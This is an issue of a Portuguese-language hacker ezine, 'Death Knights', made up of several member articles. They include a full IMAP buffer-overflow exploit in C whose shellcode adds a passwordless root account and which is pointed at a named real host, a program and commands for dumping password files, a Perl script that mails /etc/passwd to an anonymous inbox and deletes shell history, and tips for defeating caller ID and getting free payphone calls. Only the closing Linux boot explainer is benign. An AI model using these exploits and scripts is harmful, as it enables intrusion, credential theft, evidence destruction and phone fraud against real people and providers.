             T H E

       $$Pц╦"цҐ$b   ,gPц╦"цҐ$b   ,gPц╦""цҐ$b  ,gPц╦$$$$$$$$цҐ$b  ,gц╦   цҐ$b
       $$     $$  $$     $$  $$     $$       $$$$$$      $$     $$
       $$     $$  $$     "цҐ  $$     $$        $$$$       $$     $$
       $$     $$  $$PцҐ"  ,p  $$,   ,$$        `$$'       $$,   ,$$
       $$     $$  gg     $$  $$$$$$$$$         $$        $$$$$$$$$
       $$     $$  $$     $$  $$'   `$$         $$        $$'   `$$
       $$     $$  $$     $$  $$     $$         $$        $$     $$
       $$     $$  $$     $$  $$     $$        .$$.       $$     $$
       T$,   gP'  T$,   gP'  $$     $$        $$$$       $$     $$
       $$PцҐцҐц╦"    $$PцҐцҐц╦"    "цҐ     цҐ"        $$$$       "цҐ     цҐ"
                  цҐ"      <Cacaio>
                                     K N i G H T S

 ______________________________Death_Knights_________________________________
 ----------------------------------------------------------------------------

deathknights #00b

e-mail: death@deathknights.com

page: http://www.deatknights.com

 ______________________________Death_Knights_________________________________
 ----------------------------------------------------------------------------

.-----------.
|   SECOES   \_______________________________________________________________
`----------------------------------------------------------------------------'

1  * ESCLARECiMENTOS                     Cacaio
2  * CALL iD                             BlydD
3  * iMPAD XPLOiT                        |UnDeR|
4  * usando o ypcat para pegar passwd'z  ReNeGaDe
5  * TELEFONiA PUBLiCA                   Mantra
6  * Getting Passwd                      `SkyDiver`
7  * GERENCIA DE PROCESSOS EM LINUX      SaTaNfAcE
8  * Apagando LOGS!!                     SaTaNfAcE
9  * COOL STUFF                          SaTaNfAcE
10 * How to instal Linux                 pIst0ls

--

11 * E-MAiL'z                            Cacaio
12 * BONUS [1]                           ReNeGaDe
13 * BONUS [2]                           Cacaio

--

14 * FEW WORDS                           Cacaio

 ______________________________Death_Knights_________________________________
 ----------------------------------------------------------------------------

.----------------.
| ESCLARECiMENTOS \__________________________________________________________
`----------------------------------------------------------------------------'

        Nao nos responsabilizamos pela informacao contida neste zine. Se voce
usar indevidamente qualquer informacao contida aqui, a responsabilidade e' to-
da sua.
        Este grupo nao visa nenhum fim lucrativo. Nos fazemos isto por diver-
sao e nada mais.
        Se voce nao gostou da informacao contida aqui, nao nos perturbe. O
problema e' todo seu.

.----------.
|  CALL ID  \________________________________________________________________
`----------------------------------------------------------------------------'
                                by BlydD
  ц ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└б©
  бЁ 5ц ц└ц└ц└ц└ц└б© ц ц└ц└ц└ц└ц└ц└б© ц ц└б©-322ц ц└б©77-6523 563-9856 321ц ц└ц└ц└б© 563-ц ц└ц└ц└ц└ц└ц└б©-6523 бЁ
  бЁ 5бЁ ц ц└б© бЁ бЁ ц ц└ц└б© бЁ бЁ бЁ-652бЁ бЁ63-9856 988-3325 577aб© ц ц≥ 988-aб© ц ц└б© бЁ-9856 бЁ
  бЁ 5бЁ бЁ9aц└ц≥ бЁ aц└ц└ц≥ бЁ бЁ бЁ-658бЁ бЁ88-3325 321-3222 556-бЁ бЁ7 321-3бЁ бЁ бЁ бЁ-3325 бЁ
  бЁ 3бЁ бЁ5ц ц└б© бЁ ц ц└ц└б© бЁ бЁ бЁ-985бЁ бЁ21-3222 556-6587 563-бЁ бЁ6 556-6бЁ бЁ бЁ бЁ-3222 бЁ
  бЁ 5бЁ aц└ц≥ бЁ бЁ бЁ-9бЁ бЁ бЁ aц└ц└б©6бЁ aц└ц└б©6587 563-9856 323ц ц≥ aб© ц ц└б©-ц ц≥ aц└ц≥ бЁ-ц ц└б©7 бЁ
  бЁ 5aц└ц└ц└ц└ц└ц≥ aц└ц≥-3aц└ц≥ aц└ц└ц└ц└ц≥2aц└ц└ц└ц└ц≥9856 988-3325 577aц└ц└ц└ц≥ aц└ц≥-aц└ц└ц└ц└ц└ц└ц≥-aц└ц≥6 бЁ
  aц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц≥
             бЁ Sistema de Identificacao de Chamadas Telefonicas бЁ
             aц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц└ц≥
.-----------.
| INTRODUCAO \_______________________________________________________________
`----------------------------------------------------------------------------'

        Um dia, um amigo me trouxe um aparelho que dizia identificar
  chamadas. Achei muito interessante, pois achava que isso soh era possivel
  por orgaos do governo.
        Muito conhecido como BINA, porem essa marca nao existe mais dando
  espaco para outras marcas, ainda eh chamado pelo BINA ou BINAGEM... Mas
  isso nao importa. Todos sao identificadores de chamadas.
        Fiz algumas mutretas na central telefonica para poderem liberar o
  servico de identificacao na minha linha.
        Com o aparelho instalado, comecei a estudar sobre o seu funcionamento
  e suas falhas. hehehehe
        Como voces sabem, pessoas previnidas tem e fazem bom uso dos
  identificadores de chamadas.
        Realmente, eh algo que nos dah muita preocupacao.
        Se voce nunca foi uma vitima (em nosso ponto de vista) dos
  identificadores, um dia serah. O mercado tem crescido muito rapido
  e pessoas bem informadas jah estao adquirindo esses aparelhos.
        O sistema de identificacao nao eh como nos outros paises. Exige um
  sistema exclusivo, algo que somente no Brasil teria funcao.
        Em outros paises, como exemplo os EUA, eh muito simples ter um CallID
  (como eh conhecido mundialmente). Bastaria voce comprar o aparelho em
  qualquer loja do ramo, e instalar em sua linha, sem qualquer permissao com
  a companhia telefonica.
        Marcas como, IDC, SOL, CITA e muitos outros sao vendidos em todo
  Brasil. E eh bom saber tambem que nao eh possivel, de forma alguma, a
  utilizacao de um aparelho importado (feito em outro pais) nas centrais
  do Brasil.
        Tudo que existe de novo nesse ramo eu jah testei, entao digo com
  certeza que isso eh impossivel.
        Mas, caso algum dia, aparecer um aparelho que funcione (o que acho
  muito remoto), me procurem, e me informem sobre o tipo de aparelho.
        No Brasil as coisas jah sao diferentes. Voce precisa obrigatoriamete
  do reconhecimento da central telefonica e a liberacao do servico para a
  identificacao, mais conhecido como CATBIN ou CATAIC.

.--------------.
| Identificacao \____________________________________________________________
`----------------------------------------------------------------------------'

        Com a linha jah habilitada, o aparelho (de procedencia nacional)
  instalado na linha, jah estarah pronto pra identificar.
        A identificacao do numero chamador nao depende somente do CallerID.
        Quando eh feita uma ligacao, a ligacao passa por uma rota ateh chegar
  ao seu telefone.
        No momento que a central telefonica manda o sinal de RING, antes de
  enviar o ring, a central manda um sinal, que eh o numero chamador.
        Devido a essa forma que eh enviado o numero chamador, que eh preciso
  ter a habilitacao da central telefonica.
        Em paises como os EUA, a identificacao da chamada jah eh enviada
  automaticamente, quando o telefone toca. Sem ser preciso nenhum servico
  juntamente com a central telefonica.

.-----------------------.
| Bugzz na Identificacao \___________________________________________________
`----------------------------------------------------------------------------'

        Com o tempo que fui estudando sobre o metodo de identificacao,
  consegui juntar muita coisa util, para divulgacao posterior.
        Quando alguem efetua a chamada para o seu telefone, a ligacao passa
  por um enorme caminho, pode-se dizer que eh uma zona, mas vou tentar
  resumir isso.
        Essa "zona" que eu falei, eh o que faz 30% das ligacoes chegarem
  com o numero errado. (isso nao eh otimo?!?!? hehehe)
        O exemplo abaixo eh o metodo de identificacao utilizado pela
  TELEBRASILIA.

<---------EMBRATEL-----------------------><---------TELEBRASILIA--------|
<-----ORIGEM-----><--DESTINO (BRASILIA)-->

 .------.            .------------.             .--------.
 | CT 1 |------------| CT A (ARM) |------.------| AREA 2 |
 `------'          ./`---.--------\     /       `--------'
                ./`     /     /|\  '\ /
             ./`      .`----.  |    /'\         .--------.
 .------. ./`      .->| GVN |--|---'   '\_______| AREA 5 |
 | CT 2 |/`-------'   `---.-'  |      /`        `--------'
 | (ARM)|\                 \  \|/   /'
 `------' `\               .`-----/'            .----------------.
            `\.____________| CT B |-------------| AREAS 3, 4 e 9 |
                           `------\             `----------------'
                                   `\
                                     `\         .--------.
                                       `\_______| AREA 6 |
                                                `--------'

        Putz, acho que compliquei demais no desenho, mas acho que dah pra
  entender... hehehe.
        O que pode causar o erro na identificacao, eh a origem da chamada.
        As chamadas passam por umas das duas rotas. Rota CT1/CT2ARM.
        A rota que tem problema na identificacao eh a rota 2(ARM). Ela ainda
  eh analogica, e devido isso, nao manda o sinal da identificacao,
  atrapalhando a continuidade da chamada.
        O que fazer para jogar para a rota CT2(ARM)???
        Isso ainda eh meio incerto, mas jah comprovado por zilhoes de testes,
  que as chamadas DDD/DDI/ACOBRAR efetuadas de um telefone cuja a linha seja
  analogica, eh sempre enviada pela rota CT2(ARM).
        Se voce mora em Brasilia e a sua linha eh 242, 244 ou qualquer numero
  que tenha inicio com 2, parabens, sua linha eh perfeita para nao ser
  identificada quando se faz ligacao a cobrar.. hehehe
          Isso jah eh otimo, pois, se voce quizer fazer uma ligacao, que nao
  deseja ser descoberto, basta fazer isso. Eh claro, eh bom lembrar que a
  central telefonica, pode por meios queichas policiais, liberar o log das
  chamadas recebidas. Mas isso eh muito dificil.
        Aqui estao listadas os casos que podem causar falha na identificacao:

        1 - Ligacao de origem da rede Nacional e que tem acesso a Telebrasilia
            por uma central transito A (ARM) da Embratel.
        2 - Todas as ligacoes de origem na rede Nacional e bilhetadas na
            origem em centrais do tipo ARM, com qualquer destino em brasilia
            (areas 2, 3, 4, 5, 6 e 9)
        3 - Ligacoes de origem na area 6 da Telebrasilia (interior) e com
            destino a area 5 (com excecao parcial para as centrais 556, 561,
            562, 563, 567, 568, 577 e 591 que possuem encaminhamento direto
            com Transito B)
        4 - Ligacoes de origem nas areas 2 e 5 da Telebrasilia com destino
            para a area 6 e que trafegam via transito A (ARM)

        Entao, a utilizacao desse metodo seria para atrapalhar a rapida
  identificacao.
        Uma vez que o identificador de chamadas nao consegue captar a chamada
  voce terah mais tempo para utilizar a linha sem ser descoberto e flagrado
  na hora.
        Mas lembre-se, nunca use o telefone de casa para fazer algo muito
  sigiloso. Eh claro que nao vai ter o FBI batendo na sua porta. Mas voce
  poderah ter um pouco de perturbacao por parte da policia federal. hehehe.

.-------------.
| iMPAD XPLOiT \_____________________________________________________________
`----------------------------------------------------------------------------'
                                by |UnDeR|

al0w Dudes....

Vim escrever nesse zine a convite do Cacaio ( num eh pra ser puxa sako naum
mas.. valeu mesmo), bem, nesse curto espaco q tenho, falarei um pouco sobre
o xploit do imapd, nao me perguntem para que server q eu nao tenho a menor
ideia do q ele faiz... soh sei que eh um "Servico do Linux". o fato importante
e que ele e facil de ser xploitado. Esse xploit eh encontrado em algumas versoes
dos sistemas linux, o que faremos eh um overflow de buffer no sistema. Para utilizar
esse xploit voce precisa de uma shell com o compilador gcc ou cc ou g++ ou c++ ou algum
desses, contanto q funcione. :)

         Copie o imapd.c para o diretorio de Sua shell

	 Execute o comando:
		#gcc -o imap imap.c

	 Caso nao funcione, ou seja um sistema linux antigo, tente:
		#c++ -o imap imap.c ou
		#g++ -o imap imap.c ou
		#cc -o imap imap.c ou qualquer compilados q funcione.

Como eu utilizo!?!?:

	 imapd host.a.hackear.com

Bem, vou tentar hackear o host www.infinite.com.br entao....

	 imapd www.infinite.com.br

Bem, soh isso... ahhhhhhhh!!!! Quase ia me esquecendo... aih vai o imapd.c..

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <netdb.h>

char *h_to_ip(char *hostname);

char *h_to_ip(char *hostname) {

  struct hostent *h;
  struct sockaddr_in tmp;
  struct in_addr in;

  h = gethostbyname(hostname);

  if (h==NULL) { perror("Resolving the host. \n"); exit(-1); }

  memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length);
  memcpy(&in,&tmp.sin_addr.s_addr,4);

return(inet_ntoa(in));
}

void banner(void) {
  system("clear");
  printf("\nIMAP Exploit for Linux.\n");
  printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n");
  printf(" Modifications: p1 (p1@el8.org)\n");
}

main(int argc, char **argv) {

  int fd;
  struct sockaddr_in sckdaddr;
  char *hostname;
  char buf[4092];
  int i=8;
  char realegg[] =
    "\xeb\x58\x5e"
    "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
    "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
    "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
    "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
    "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
    "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
    "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
    "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
    "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff"
    "/etc/passwdxroot::0:0:r00t:/:/bin/bashx";
  char *point = realegg;
  buf[0]='*';
  buf[1]=' ';
  buf[2]='l';
  buf[3]='o';
  buf[4]='g';
  buf[5]='i';
  buf[6]='n';
  buf[7]=' ';

  banner();

  if (argc<2)  {
     printf("\nUsage: %s <hostname>\n\n", argv[0]);
     exit(-1);
  }

  hostname=argv[1];

  while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */
    buf[i++]=0x90;

  while(*point)
    buf[i++]=*(point++);

  buf[i++]=0x83; /* ebp */
  buf[i++]=0xf3;
  buf[i++]=0xff;
  buf[i++]=0xbf;
  buf[i++]=0x88; /* ret adr */
  buf[i++]=0xf8;
  buf[i++]=0xff;
  buf[i++]=0xbf;

  buf[i++]=' ';
  buf[i++]='b';
  buf[i++]='a';
  buf[i++]='h';
  buf[i++]='\n';

  buf[i++]=0x0;

  if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the
socket. \n");

  sckdaddr.sin_port=htons(143);
  sckdaddr.sin_family=AF_INET;
  sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname));

  if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0)
perror("Error with connecting. \n");

  printf("hmm: \n");
  getchar();
  write(fd,buf,strlen(buf)+1);
  printf("hmm: \n");
  close(fd);
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

.-------.
| YPCAT  \___________________________________________________________________
`----------------------------------------------------------------------------'
                                by ReNeGaDe

O que podemos falar sobre esse assunto vou comecar explicando um metodo
facil de como pegar mais so pega mesmo se o Admin for muito Lamer para
deixar esse BUG ainda entao la vai...

1 Metodo:

E so vocк├ ir em qualquer dir e escrever: ypcat passwd.byname>senhas
ou inves de ypcat pode usar cat ai ele vai criar um arq como senhas
com o passwd la simples nao??

2 Metodo:

Para quem nao sabe esse metodo e com o unshadow.c se voce nao tem ele olha
ele ai..

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

#include <pwd.h>

main()
{
  struct passwd *p;
  while(p=getpwent())
  printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

Voce vai pegar mandar esse unshadow.c para a shell chegando la vc compila com
o cc ou gcc nao importa os dois serve quando compilar so e voce executar
a.out>passwd
Acabou aqui esses sao os dois metodos mais simples de se pegar um passwd na
minha opniao na proxima edicao a gente vai aprofundar mais no assunto espero
que gostem.

.------------------.
| TELEFONiA PUBLiCA \________________________________________________________
`----------------------------------------------------------------------------'
                              by Mantra

        Como um Death Knight essa e' a minha primeira materia. Escrevo tambem
no ZDHI do meu amigo DevilSpirit, mas o leitor do zine e' completamente
diferente; no ZDHI escrevo para iniciantes. Aqui escreverei pra quem
ja' tem uma boa base e e' capaz de entender alguns termos tecnicos fundamentais
ao bom phreaker. Pela curta esperiencia, porem util, q tenho escrevendo zines,
percebi q os leitores procuram o lado pratico da coisa, nao levando em conta
o universo q e' a telefonia. O contrario tambem ocorre. De nada adianta colocar
uma materia sobre clonagem se a maioria dos q vao ler (mesmo os hackers tarimbados)
nao tem acesso a um codigo secreto de 6 digitos de um telefone qualquer a ser
clonado e muito menos tem acesso a um scanner, q alem de caro exige de quem usa
conhecimento tecnico razoavel para pegar o numero do telefone e o codigo.
 E' pensando nisso q pretendo falar sobre aqueles topicos mais comentados e
q atraem mais quem pensa em ingressar como phreaker. Eu sei q muitos zines ja'
abordaram esses assuntos, mas muitos deles nao dao a devida atencao e
esclarecimentos q o assunto exige.
	Vou comecar com materias bem simples, porem ricas em detalhes de forma
q a pessoa q estiver lendo possa fazer, possa aplicar o q tem no zine e nao
so' "babar" vendo o assunto. Conforme as criticas q eu receber e conforme as
exigencias q se fizerem necessarias eu mudo o estilo da minha sessao no zine
e o assunto.
	Essa e' a primeira de uma serie de tres materias sobre telefonia onde
abordo o *principal* e mais elementar de telefonia celular, residencial
(privada) e publica.

1.0-)   TELEFONIA PUBLICA
           Depois do famoso "Manual definitivo de violacao a telefones publicos
           e privados", conhecido como "tel_br11", feito por Tom Waits, a telefonia
           publica foi desmistificada no Brasil. Com um diodo IN 4007 e um resistor
           de valor nominal 22k e potencia de 1 watt se consegue qualquer coisa.
           Funciona perfeitamente, mas nao e' pratico. Quem esta' numa rua e precisa
           fazer uma ligacao, muito provavelmente nao ira' puxar o fio do telefone e
           descascar, e mesmo q o fio ja' tenha sido "usado" por outro phreaker, nao
           e' muito pratico pegar um diodo e um resistor e sair testando nos fios ate
           encontrar qual deles esta' dando sinal. O lance do diodo e do resistor so'
           e' aplicavel em ultimo caso e num telefone q se use bastante. Esse foi um
           dos motivos q aqui no Ceara' os telefones publicos do shopping foram trans-
           feridos para uma area mais visivel. Antes ficavam proximos aos banheiros e
           o estado dos fios ... lamentavel.

        1.1-) Desmitificando a telefonia

      Pensando na comodidade e na praticidade muitos phreakers escreveram
      milhoes de coisas, muitas delas absurdas, sobre como ligar de graca
      a partir do cartao, sem a necessidade de descascar fio algum. Muitas
      delas porem sao inuteis. A fina camada de esmalte no cartao nao funciona,
      o esmalte nao afeta em nada as celulas magneticas do cartao. O grafite e'
      condutor de eletricidade, mas conduz pouco, a maioria da eletricidade se
      dispersa e se transforma em calor, se considerarmos uma fina camada de
      grafite no cartao, essa conducao de eletricidade e' desprezivel frente a
      acao magnetica do leitor.
      E' preciso deixar claro q o cartao NAO POSSUI MICROFUSIVEIS q sao queimados.
      Isso e' a maior tolice e ingenuidade q se pode dizer a respeito de telefonia
      publica. NAO EXISTEM MICROFUSIVEIS, NADA SE QUEIMA DENTRO DO CARTAO. O q
      existe no cartao sao pares de celulas formadas por uma finissima camada
      metalica (vc pode observar isso raspando o cartao, ate aparecerem as celulas).
      Essas ligacoes sao desfeitas MAGNETICAMENTE, nao tem nada a ver com "raio laser
      q queima os microfusiveis".

        !.2-) Ligando de graca

      Quando o cartao e' colocado, age sobre ele um campo magnetico q indica a
      quantidade de unidades do cartao. Se vc utilizar aquele metodo de colocar e
      retirar o cartao varias vezes e derepente colocar o cartao dentro, irao
      aparecer mais unidades q o normal, mas assim q a ligacao for completada o
      aparelho checa novamente as unidades, a ligacao acaba caindo. O aparelho
      sempre checa a quantidade de unidades do cartao, SEMPRE. Uma maneira q
      permite q o cartao leia as unidades do cartao, mas q evita q as ligacoes
      entre as celulas sejam rompidas e' a utilizacao de negativo de filme
      fotografico na parte inferior do cartao telefonico. Essa tecnica foi testada
      e funcionou perfeitamente. Mas atencao: nos aparelhos mais recentes
      (ha' o nome de uma marca especifica, mas nao me recordo o nome) a ligacao so'
      e' completada apos retirar-se a unidade do cartao e verificacao do total de
      unidades.
      Uma outra maneira muito interessante e pouco conhecida e' a digitacao de uma
      sequencia de numeros apos teclar-se o numeor do destino. Essa sequencia
      funciona de tal forma q o telefone nao retira unidades do cartao. E' apenas
      uma preliminar, nao conheco ainda esses codigos de destravamento do telefone,
      mas pelo q me informei recentemente com alguns tecnicos da teleceara, de fato
      isso existe.

.---------------.
| Geting passwd  \___________________________________________________________
`----------------------------------------------------------------------------'
                               by `SkyDiver`

        Frequento uma rede de IRC e meu nickname(apelidio)
        e `SkyDiver`, como o nickname mesmo diz gosto de
        voar, viajar pela rede mundial de computadores
        (Internet), sou um dos integrantes do grupo que
        tem como responsavel o Cacaio, tenho 17 anos, minha
        experiencia com rede Internet e de aproximadamente 2
        anos, mas afirmo que foram proveitosos, tenho
        conhecimentos de alguma linguagens de programacao
        que me auxiliam, como: C++, Delphi, Java Script,
        HTML, Perl e CGI.  Relato nesta entrevista como fiz
        para pegar as senhas de um provedor de acesso a
        Internet passando apenas 5 segundos logado
        (conectado) a maquina remota.
        Usei uma estrategia um pouco diferente para poder
        hackear as senhas. Primeiramente conectei com uma
        conta criada em um provedor que oferece um servico
        de cadastro on-line atraves de nvmeros de cartao de
        credito e libera o acesso ao preencher os dados,
        mesmo preenchendo errado [nao precisa dizer que e a Elogica]:).
        Ao me despistar do
        rastreador de hackers, comecei com a diversao. Dei
        um telnet para o meu alvo (servidor da noite como
        gosto de chamar). Ao logar com uma conta Shell que
        consegui com a ajuda de uns dos integrantes do grupo
        o SaTaNfAcE.
        Eu poderia ter pego as senhas executando os
        comando manualmente no prompt do servidor, mas
        preferi gastar mais tempo fazendo um script na
        linguagem de programacao  Perl, para que realizasse
        a minha tarefa e meu tempo logado no servidor fosse
        curto assim evitando que algum administrador que
        possivelmente estivesse logado, poderia me detectar
        e dar um Kill (matar) no meu processo e
        possivelmente remover a conta que estava usando no
        momento ou tomado precaucoes onde eu nao poderia
        fazer mais nada no momento. Esse script que sito
        abaixo o seu codigo fonte, envia o conteudo do
        arquivo de senhas(geralmente passwd, quando o
        servidor nao tem o shadow instalado) para minha
        caixa anonima de e-mail criada em um servidor de
        e-mails anonimos conhecido pelas pessoas que gostam
        de ter um endereco de mail sem se identificar, e
        deixando uma mensagem para o "administrador" do
        servidor invadido, nao teria graca se eu pegasse a
        senha root(super usuario) e removesse tudo do
        sistema, o cadastro de clientes ou mesmo mudar as
        senhas de todos os clientes, preferi ao inves disso
        apenas deixar uma mensagem para o
        SysAdm(Administrador de sistema).
            Antes de tudo tive que adaptar o meu programa
        com as configuracoes do servidor a ser hackeado ou
        seja especificando onde estava o interpretador da
        linguagem Perl, para que meu script fosse executado
        com sucesso. Para saber onde realmente estava o
        compilador apenas usei o comando 'whereis' do Unix,
        entao ele me retornou o cominho onde se encontrava o
        interpretador, que esta especificada na primeira
        linha do programa. Apesar de ser um programa simples
        realiza as minhas terefas com precisao.

Nome do script: Send-me.pl

#Indico ao sistema em que interpretador este script irar usar
#para ser executado

#!/usr/bin/perl

#Abrindo a variavel onde recebera as linhas de comando a serem executadas
open(PASS, "|

#Transferindo o centeц╨do dos arquivos de senhas para o arquivo (pass.now)
#criado pelo script.
cat /etc/passwd > pass.now;

#Enviando o arquivo gerado para o meu mail anonimo (conta de
#mail gerada no Hot Mail)
mail mail\@hotmail.com < pass.now;

#Removendo o arquivo criado (pass.now)
rm -f pass.now;

#Removendo o log (toda terefa que realizei durante o logon no
#servidor) salvado no arquivo '.bash_history'
rm -f .bash_history;

#Finalizando o processo
");

# Fechando a variavel "PASS"
close(PASS);

#-=-=-=-=-=-=-=-=-=-=-=-=-
#Inicializando o processo para criar o log deixando uma
#mensagem para o administrador

#Iniciando a variavel
open (LOG, "

#Salvando o conteudo passado para a variavel 'LOG'em
# '.bash_history' deixando a mensagem...
>>.bash_history");

#Adicionando o texto a variavel 'LOG'
print LOG "Ao ler este log, ja sera' tarde  demais...\n The Death Knights";

#Finalizando o processo de LOG
close(LOG);

Isso tudo so foi permitido ocorrer por ter usado uma conta shell que me da
permissao para executar scripts no meu home (diretorio onde o dono da shell
pode criar e executar tarefas). A senha era 'senha97' onde isso e um erro
grave tanto dono da Shell quanto o SysAdm.
     Erro do dono da conta shell foi cometida quando ele colocou uma senha
ingenua como esta, e o do SysAdm foi deixar permissao para que o diretorio
'etc' (o diretorio onde fica os arquivos de senhas e configuracoes do servidor)
liberada para as contas mesmo sendo Shell, tambem isso poderia ser evitado
ao instalar o shadow (um arquivo onde as senhas ficam com mais seguranca) .
e aconselhavel colocar uma senha que tenha caracteres maiusculos e
minusculos assim incluindo numeros e caracteres especiais como : @, #, $, %,
^^, *, =, e outros.
    Exemplo de uma senha: 'M&uNom&80', onde estou dificultando e
colocando a minha senha facil de lembrar, com meu nome e o ano em que
nasci.

.-------------------------------.
| GERENCIA DE PROCESSOS EM LINUX \___________________________________________
`----------------------------------------------------------------------------'
                              by SaTaNfAcE

	Y0z d00dz!!! Bem vamos ao q interressa!!!
	Bem, nessa matehria eu irei falar um pouco da "parte logica" do linux,
        pra ser mais claro, nessa matehria escrevi sobre como o Linux gerencia
        seus processos, sobre o boot do sistema e sobre a gerencia de processos
        pelo Kernel!!! Eh iss0 aih espero q a matehria seja util!!!!

 Consideracoes Iniciais

        Para explicarmos como o Linux gerencia processos, faremos consideracoes
        iniciais sobre o codigo fonte do kernel do Linux (onde encontramos a
        implementacao da Gerencia de Processos) e a inicializacao "boot" do
        sistema.
        Nos tentaremos explicar, de uma maneira ordenada o codigo fonte do
        Linux, tentando conseguir um bom entendimento sobre como o codigo fonte
        esta situado e como as caracteristicas mais relevantes do UNIX foram
        implementadas. O objetivo e ajuda-lo a se familiarizar com o projeto
        geral do Linux. Entao, vamos comecar por onde o Linux comeca: seu
        sistema de boot.
        Um bom entendimento da linguagem C e necessario para entender este
        material, assim como familiaridade com conceitos de UNIX e arquitetura
        dos PCs. Porem, nenhum ccdigo C aparecera neste material, mas
        referencias de onde podem ser encontrados.
        Qualquer referencia "pathname" a arquivos tem como ponto de partida a
        arvore principal de fontes, usualmente /usr/src/linux.
        A maioria das informacoes reportadas aqui tem como referencia o codigo
        fonte do Linux versao 1.0. Referencias a versoes posteriores conterao
        o simbolo.
        Caso o simbolo nao estiver presente, significa que nao houveram modi-
        ficacoes apos as versoes 1.0.9-1.1.76.
                Ocasionalmente um paragrafo como este ocorrera no texto.
        Indicando onde poderam ser obtidas mais informacces sobre o assunto
        corrente (geralmente o codigo fonte).

Inicializacao  ("boot" do sistema)

        Quando o PC e ligado, o processador 80x86 encontra-se em modo real e
        executa o codigo contido no endereco 0xFFFF0, que corresponde a um
        endereco ROM-BIOS. O BIOS do PC realiza alguns testes no sistema e
        inicializa o vetor de interrupcoes no endereco fisico 0. Depois disto
        ele carrega o primeiro setor do device bootavel em 0x7C00, e passa a
        execucao para este endereco. O device e, usualmente, o disquete ou o
        disco rigido. A descricao anterior e um tanto simplificada, mas e tudo
        que se necessita para entender o trabalho inicial do kernel.
        A primeirissima parte do kernel Linux esta escrito em linguagem assem-
        bly 8086 (boot/bootsect.S). Quando e executado, ele se move para o en-
        dereco absoluto 0x90000, carrega os proximos 2 kBytes de codigo do
        device de boot ate o endereco 0x90200, e o resto do kernel para o en-
        dereco 0x10000. A mensagem "Loading..." e apresentada durante o
        carregamento do sistema. O controle e, entao passado para o codigo
        contido em boot/Setup.S, outro codigo assembly de modo real.
        A parte de "setup" identifica algumas caracteristicas do sistema
        (hardware) e o tipo da placa VGA. Se requerido, pede ao usuario para
        escolher o modo do video da console. E, entao, move todo o sistema do
        endereco 0x10000 para o endereco 0x1000, passa para o modo protegido
        e passa o controle para o resto do sistema (endereco 0x1000).
        O proximo passo e a descompressso do kernel. O codigo em 0x1000 vem
        de zBoot/head.S que inicializa os registradores e invoca
        decompress_kernel(), o qual e composto por zBoot/inflate.c,
        zBoot/unzip.c e zBoot/misc.c. O dado "descompresso" vai para o
        endereco 0x100000 (1 Mega), e esta e a principal razao do por que o
        Linux nao pode rodar com menos de 2 Megas de RAM.

        O encapsulamento do kernel em um arquivo gzip e realizado por Makefile
        e utilitarios no diretorio zBoot. Sao arquivos interessantes para se
        dar uma olhada.

        O codigo "descompresso" e executado a partir do endereco 0x1010000 ,
        onde todo o setup 32-bit esta lotado: IDT, GDT e LDT sao carregados,
        o processador e o co-processador sao identificados, a rotina
        start_kernel e invocada. Os arquivos fonte das operacoes acima estao
        em boot/head.S. Este, talvez, seja o codigo mais dificil em todo o
        kernel do Linux.
	Note que se algum erro ocorrer durante alguns dos passos precedentes,
        o computador ira travar. O sistema operacional nao pode manipular erros
        enquanto nao estiver totalmente operante.
	start_kernel() reside em init/main.c. Tode de agora em diante esta
        codificado em linguagem C, exceto gerencia de interrupcoes e chamadas
        de sistemas (Bem, a maior parte das macros possuem codigos assembly
        embutidos, tambem).
        Depois dos procedimentos com todas as questoes iniciais,
        start_kernel() inicializa todas as partes do kernel, especificamente:

         Inicializa a memoria e chama paging_init().
	 Inicializa os traps, canais IRQ e scheduling.
	 Se requerido, aloja um profiling buffer.
	 Inicializa todos device drives e buffers de discos, bem como outras
         partes menores.
